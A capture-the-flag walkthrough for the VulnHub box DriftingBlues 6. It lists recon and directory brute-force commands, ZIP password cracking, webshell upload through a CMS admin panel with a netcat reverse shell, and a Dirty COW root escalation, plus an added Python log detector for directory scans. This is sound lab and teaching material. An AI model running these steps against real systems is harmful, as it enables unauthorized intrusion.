target address: https://www.vulnhub.com/entry/driftingblues-6,672/
1. Host discovery
arp-scan -i eth0 -l (specify the network card; -l scans the whole local network) lists every device on the LAN (IP, MAC address, vendor)
masscan 192.168.111.0/24 -p 80,22 (masscan over the network segment; -p gives the port numbers to scan)
netdiscover -i eth0 -r 192.168.184.0/24
nmap -sn 192.168.111.0/24
2. Port scan
nmap -sS -A -sV -T4 -p- 192.168.111.18
80—http—Apache httpd 2.2.22 ((Debian))
3. Visiting port 80 shows nothing useful; check the page source, then run a directory scan
gobuster dir -u "http://192.168.111.18/" -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak
We see our old friend /robots.txt; its contents are:
User-agent: *
Disallow: /textpattern/textpattern
dont forget to add .zip extension to your dir-brute
;)
Visiting /textpattern/textpattern/ shows the following
Fingerprinting identifies it as Textpattern CMS
robots.txt also reminds us not to forget the .zip extension; the scan results include /spammer.zip, so download the archive and try to open it, and it turns out to be password-protected
4. Crack the ZIP password on Kali
1. zip2john spammer.zip > password.txt
2. john --wordlist=/usr/share/wordlists/rockyou.txt password.txt
The password is myspace4. After extracting the archive and opening the file inside, it contains the credentials mayer:lionheart
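As an added defensive example (not part of the original writeup), the gobuster run above leaves a distinctive trace in the web server's access log: a burst of 404s from one client, many of them for the .zip/.bak/.txt extensions the scan probes. The Python below flags such clients over constructed Apache combined-format log lines; the IPs, paths and thresholds are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log line; the sample lines below are constructed, not taken from the box.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Extensions the walkthrough's gobuster run probes for: a burst of 404s on these
# is the footprint of a dir-brute hunting for leftover archives like spammer.zip.
ARCHIVE_EXT = (".zip", ".bak", ".txt")

def parse(line):
    """Return ip/timestamp/path/status for one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "path": m["path"], "status": int(m["status"])}

def detect_dir_brute(lines, window_s=60, max_404=20):
    """Flag clients with more than max_404 NotFound responses inside any window_s
    seconds, and list the archive-style paths each flagged client requested."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec["status"] == 404:
            by_ip[rec["ip"]].append(rec)
    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        lo = 0  # sliding window [lo, hi] over the sorted 404 timestamps
        for hi in range(len(recs)):
            while (recs[hi]["ts"] - recs[lo]["ts"]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 > max_404:
                archive = sorted({r["path"] for r in recs if r["path"].lower().endswith(ARCHIVE_EXT)})
                alerts[ip] = {"count_404": len(recs), "archive_paths": archive}
                break
    return alerts

# Constructed sample: a scanner firing 30 guesses in 10 s and one ordinary visitor.
SAMPLE = [f'192.168.111.50 - - [01/Jan/2024:10:00:{i % 10:02d} +0000] "GET /{w} HTTP/1.1" 404 289 "-" "gobuster/3.1"'
          for i, w in enumerate(["admin", "backup.zip", "old.bak", "test.php", "index.bak"] * 6)]
SAMPLE += ['192.168.111.7 - - [01/Jan/2024:10:00:05 +0000] "GET /robots.txt HTTP/1.1" 200 104 "-" "Mozilla/5.0"',
           '192.168.111.7 - - [01/Jan/2024:10:00:06 +0000] "GET /missing.png HTTP/1.1" 404 289 "-" "Mozilla/5.0"']

if __name__ == "__main__":
    for ip, info in detect_dir_brute(SAMPLE).items():
        print(f"{ip}: {info['count_404']} x 404, archive probes: {info['archive_paths']}")
```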
5. After logging in, the CMS version shows as 4.8.3
Idea 1: search Kali's local exploit database: searchsploit textpattern 4.8.3; tested, it did not work
Idea 2: look for usable functionality in the admin backend
Under Content there is a file upload feature
Upload our reverse-shell webshell (change the IP and port inside the file to your own Kali IP and listener port); nothing is shown after the upload
But the upload path can be seen in the admin management interface
Start a listener on Kali: nc -lvnp 1234
Visit the uploaded file to get the reverse shell
Use python to upgrade to a bash shell: python -c 'import pty; pty.spawn("/bin/bash")'
6. Privilege escalation
1. Try SUID binaries: find / -perm -u=s -type f 2>/dev/null
Check the results against https://gtfobins.github.io/
2. uname -a
Linux DriftingBlues 3.2.0-4-AMD
Then we log in as firefart (the user created by the Dirty COW exploit) with the password we set ourselves (I entered root) and get root privileges
Summary:
1. Information gathering to find a sensitive file
2. zip2john + john to crack the ZIP password
3. Use the backend file upload to get a webshell
4. Dirty COW privilege escalation to root
That's it ~
Writeup provided by a Peng Group security expert